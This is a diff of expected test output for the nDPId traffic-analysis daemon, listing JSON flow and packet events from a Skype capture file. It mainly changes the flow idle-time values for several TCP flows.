-00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":602,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1431970649777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970649777,"pkt":"0NQSxnP1PBXCt3IOCABFAABAvnJAAEAGmhbAqAEiQTffLcgjnEma5hywAAAAALAC\/\/85DwAAAgQFtAEDAwUBAQgKPjHBiQAAAAAEAgAA"} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":603,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51236,"dst_port":40008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":603,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1431970649777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970649777,"pkt":"0NQSxnP1PBXCt3IOCABFAABATBhAAEAGcsvAqAEib91KLcgknEjYMAm6AAAAALAC\/\/91FQAAAgQFtAEDAwUBAQgKPjHBiQAAAAAEAgAA"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":601,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51234,"dst_port":40001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1431970649777,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970649777,"pkt":"0NQSxnP1PBXCt3IOCABFAABADS1AAEAG4vXAqAEinTfrk8ginEEPp71\/AAAAALAC\/\/+7IQAAAgQFtAEDAwUBAQgKPjHBiQAAAAAEAgAA"} 
+00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":602,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51235,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":602,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1431970649777,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970649777,"pkt":"0NQSxnP1PBXCt3IOCABFAABAvnJAAEAGmhbAqAEiQTffLcgjnEma5hywAAAAALAC\/\/85DwAAAgQFtAEDAwUBAQgKPjHBiQAAAAAEAgAA"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":603,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51236,"dst_port":40008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":603,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1431970649777,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970649777,"pkt":"0NQSxnP1PBXCt3IOCABFAABATBhAAEAGcsvAqAEib91KLcgknEjYMAm6AAAAALAC\/\/91FQAAAgQFtAEDAwUBAQgKPjHBiQAAAAAEAgAA"} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":604,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.171","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":604,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1431970649777,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431970649777,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5i9YAAEARDTHAqAEinTeCqzLdnEwAJdiNeuEC3c6rdtKsOez6ZXpeJVa7dJ779QK3\/h1JCUU="} 
00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.171","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -247,14 +247,14 @@ 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":608,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649778,"flow_last_seen":1431970649778,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970649778,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.25","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1431970649778,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431970649778,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+a34AAEARfBXAqAEinTg0GTLdnEoAKvPOeukCU4Ora98LBiEx3upKt3C\/idNCTbgKHnJdEXlx5pIWdA=="} 00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":608,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649778,"flow_last_seen":1431970649778,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970649778,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.25","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1431970649858,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970649858,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iadN+uTwKgBIpxByCKHTehVD6e9gKASOJCRTQAAAgQFrAQCCApMYEY4PjHBiQEDAwk="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":621,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1431970649858,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970649858,"pkt":"0NQSxnP1PBXCt3IOCABFAAA05xhAAEAGCRbAqAEinTfrk8ginEEPp72Ah03oVoAQECzoKAAAAQEICj4xwdhMYEY4"} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":623,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1431970649908,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970649908,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGYo1BN98twKgBIpxJyCPPJ6UGmuYcsaASOJBnJAAAAgQFrAQCCApNlOiPPjHBiQEDAwk="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":624,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1431970649908,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970649908,"pkt":"0NQSxnP1PBXCt3IOCABFAAA05LlAAEAGc9vAqAEiQTffLcgjnEma5hyxzyelB4AQECy9zQAAAQEICj4xwgpNlOiP"} 
-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1431970650073,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970650073,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGyOdv3UotwKgBIpxIyCR2KHXg2DAJu6ASOJBnsgAAAgQFrAQCCApNh6w6PjHBiQEDAwk="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":635,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1431970650073,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970650073,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0S0FAAEAGc67AqAEib91KLcgknEjYMAm7dih14YAQECy9uQAAAQEICj4xwqxNh6w6"} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":644,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650785,"flow_last_seen":1431970650785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970650785,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51237,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":644,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1431970650785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970650785,"pkt":"0NQSxnP1PBXCt3IOCABFAABAQ6lAAEAGFV3AqAEinTeCsMglnFZwrI8vAAAAALAC\/\/\/tTwAAAgQFtAEDAwUBAQgKPjHFcQAAAAAEAgAA"} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1431970649858,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970649858,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iadN+uTwKgBIpxByCKHTehVD6e9gKASOJCRTQAAAgQFrAQCCApMYEY4PjHBiQEDAwk="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":621,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1431970649858,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970649858,"pkt":"0NQSxnP1PBXCt3IOCABFAAA05xhAAEAGCRbAqAEinTfrk8ginEEPp72Ah03oVoAQECzoKAAAAQEICj4xwdhMYEY4"} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":623,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1431970649908,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970649908,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGYo1BN98twKgBIpxJyCPPJ6UGmuYcsaASOJBnJAAAAgQFrAQCCApNlOiPPjHBiQEDAwk="} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":624,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1431970649908,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970649908,"pkt":"0NQSxnP1PBXCt3IOCABFAAA05LlAAEAGc9vAqAEiQTffLcgjnEma5hyxzyelB4AQECy9zQAAAQEICj4xwgpNlOiP"} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1431970650073,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970650073,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGyOdv3UotwKgBIpxIyCR2KHXg2DAJu6ASOJBnsgAAAgQFrAQCCApNh6w6PjHBiQEDAwk="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":635,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1431970650073,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970650073,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0S0FAAEAGc67AqAEib91KLcgknEjYMAm7dih14YAQECy9uQAAAQEICj4xwqxNh6w6"} 
+00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":644,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650785,"flow_last_seen":1431970650785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970650785,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51237,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":644,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1431970650785,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970650785,"pkt":"0NQSxnP1PBXCt3IOCABFAABAQ6lAAEAGFV3AqAEinTeCsMglnFZwrI8vAAAAALAC\/\/\/tTwAAAgQFtAEDAwUBAQgKPjHFcQAAAAAEAgAA"} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1431970650786,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970650786,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8ax0AAEARLXbAqAEiQTffHDLdnE4AKA\/ueusCO4\/2IMsd1vZVtYtrG4KJHI0MKaf\/zYcpuYfyCTg="} 00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":645,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -270,20 +270,20 @@ 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":649,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1431970650786,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970650786,"pkt":"0NQSxnP1PBXCt3IOCABFAABA\/bcAAEARMcnAqAEi1cezmjLdnFEALEFuevMCLFThLGMqgdMtKoErvKHNoLTdO9PKUomxAAk6+9gobSzp"} 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":649,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1431970650909,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970650909,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYgqdN4KwwKgBIpxWyCXC803gcKyPMKASOJCo1gAAAgQFrAQCCApOqL1kPjHFcQEDAwk="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1431970650910,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970650910,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0eB9AAEAG4PLAqAEinTeCsMglnFZwrI8wwvNN4YAQECz\/hAAAAQEICj4xxe1OqL1k"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":658,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651380,"flow_last_seen":1431970651380,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970651380,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51238,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":658,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1431970651380,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970651380,"pkt":"0NQSxnP1PBXCt3IOCABFAABADJRAAEAG447AqAEinTfrk8gmAbvxz5x7AAAAALAC\/\/+ORwAAAgQFtAEDAwUBAQgKPjHHwQAAAAAEAgAA"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":659,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651380,"flow_last_seen":1431970651380,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970651380,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51239,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":659,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1431970651380,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970651380,"pkt":"0NQSxnP1PBXCt3IOCABFAABA+dJAAEAGXrbAqAEiQTffLcgnAbvOrmZyAAAAALAC\/\/9P1wAAAgQFtAEDAwUBAQgKPjHHwQAAAAAEAgAA"} 
-00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":660,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651380,"flow_last_seen":1431970651380,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970651380,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":660,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1431970651380,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970651380,"pkt":"0NQSxnP1PBXCt3IOCABFAABAiTBAAEAGNbPAqAEib91KLcgoAbtIes+yAAAAALAC\/\/\/TJAAAAgQFtAEDAwUBAQgKPjHHwQAAAAAEAgAA"} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1431970651444,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970651444,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iadN+uTwKgBIgG7yCZm7uws8c+cfKASOJB\/agAAAgQFrAQCCApMYEfJPjHHwQEDAwk="} 
